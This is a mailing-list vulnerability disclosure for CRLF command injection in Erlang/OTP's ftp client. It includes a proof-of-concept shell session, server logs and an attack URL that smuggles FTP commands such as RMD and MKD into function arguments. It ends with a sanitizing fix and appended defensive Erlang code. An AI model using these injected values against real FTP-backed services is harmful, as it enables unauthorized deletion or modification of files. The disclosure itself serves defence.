[erlang-bugs] FTP command injection vulnerability in module "ftp"
Seba
argos83@REDACTED
Mon Jan 27 12:10:13 CET 2014
Hi!
There is an FTP Command Injection vulnerability in the "ftp" module.
All functions that write a string argument to the control
socket appear to be affected:
user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3
Vulnerability Description
-------------------------
An FTP session consists of two channels:
* A TCP control channel: text-based, served by the FTP server.
* A TCP data channel: created by either the FTP client or the FTP
server, depending on whether data is transferred in active or
passive mode.
The control channel works in a request-response fashion. Each command
is issued by the client in a single line (ending with a carriage
return and a new line: \r\n).
If a function argument contains a \r\n sequence followed by another
command, the ftp module writes the whole string to the socket
unchanged, so the server receives the injected command as a separate
request line.
E.g. the following Erlang shell session:
1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok
Generates the following FTP session:
FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)."
Attack Scenario Example
-----------------------
A web server allows users to browse and download documents.
Internally, the web server connects to a private FTP server using the
OTP "ftp" module.
An attacker might exploit the vulnerability to perform actions that
are not meant to be exposed, e.g. deleting a directory by
requesting:
http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs
Tested on
---------
- R15B03
- Ubuntu 12.04 x86_64
- FTP Server: vsftpd
Fixing
------
String arguments used to build the command request should be
sanitized first (by removing "\r" and "\n").
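As an added illustration of the fix proposed above (this is example code written for this note, not the OTP ftp module's own implementation), the following Erlang module validates or strips control-channel arguments before they reach the socket. The module name, `check/1`, `strip/1` and the `safe_cd/2` wrapper are hypothetical; the injection string used in `demo/0` is the one from the shell session above.

```erlang
%% ftp_arg_check: added example, not part of OTP's ftp module.
%% Guards string arguments before they are written to the FTP control
%% channel. FTP command lines end in CRLF, so a CR or LF inside an
%% argument lets the rest of the string be read as further commands.
-module(ftp_arg_check).
-export([check/1, strip/1, safe_cd/2, demo/0]).

%% check/1: reject (rather than silently alter) any argument that
%% contains a carriage return or line feed.
-spec check(string()) -> {ok, string()} | {error, ctrl_chars}.
check(Arg) when is_list(Arg) ->
    case lists:any(fun(C) -> C =:= $\r orelse C =:= $\n end, Arg) of
        true  -> {error, ctrl_chars};
        false -> {ok, Arg}
    end.

%% strip/1: the sanitizing approach the fixing section suggests,
%% i.e. remove "\r" and "\n" from the argument.
-spec strip(string()) -> string().
strip(Arg) when is_list(Arg) ->
    [C || C <- Arg, C =/= $\r, C =/= $\n].

%% safe_cd/2: hypothetical wrapper around ftp:cd/2 that refuses an
%% argument with embedded line endings instead of sending it.
-spec safe_cd(pid(), string()) -> ok | {error, term()}.
safe_cd(Pid, Dir) ->
    case check(Dir) of
        {ok, Clean}      -> ftp:cd(Pid, Clean);
        {error, _} = Err -> Err
    end.

%% demo/0: exercises the checks with the argument from the shell
%% session above and with a benign path; returns ok if all match.
-spec demo() -> ok.
demo() ->
    Injected = "/pub\r\nRMD new_dir\r\nPASV",
    {error, ctrl_chars} = check(Injected),
    {ok, "/pub"} = check("/pub"),
    "/pubRMD new_dirPASV" = strip(Injected),
    ok.
```

Rejecting the argument (`check/1`) is generally preferable to stripping, because a stripped string such as `"/pubRMD new_dirPASV"` still names a path the caller never intended; `strip/1` is included because it mirrors the removal-based fix described above.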
Sebastián Tello